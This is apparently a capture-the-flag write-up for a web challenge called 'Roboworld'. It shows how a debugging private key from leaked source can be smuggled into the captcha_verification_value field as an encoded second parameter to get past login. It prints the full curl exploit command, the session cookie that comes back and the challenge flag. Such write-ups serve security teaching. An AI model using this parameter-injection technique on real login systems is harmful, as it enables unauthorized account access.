Roboworld
web
A friend of mine told me about this website where I can find secret cool stuff. He even managed to leak a part of the source code for me, but when I try to login it always fails :(
Can you figure out what’s wrong and access the secret files?
Solution
When looking into the leaked source code, you can find a debugging privkey. When you test some requests to the /captchaVerify endpoint with that key, it seems it makes the captchaUserValue accept any value. So lets try to inject that private key to the captcha_verification_value field:
$ curl 'http://challs.xmas.htsp.ro:11000/login' --data 'user=backd00r&pass=catsrcool&captcha_verification_value=AAAA%26privateKey=8EE86735658A9CE426EAF4E26BB0450E' -vvv
Yeah it works! The important information of the response are a session cookie and the redirection to that dashboard page:
Set-Cookie: session=eyJsb2dnZWQiOnRydWV9.XffUxA.M-sXpowWOM2fqtA9vYzHff-wl-Y;
<p>You should be redirected automatically to target URL: <a href="/dashboard_jidcc88574c">/dashboard_jidcc88574c</a>. If not click the link.
When we set the cookie and visit the page, there are three links, the last one is a video that shows the flag at the bottom.
flag: X-MAS{Am_1_Th3_R0bot?_0.o}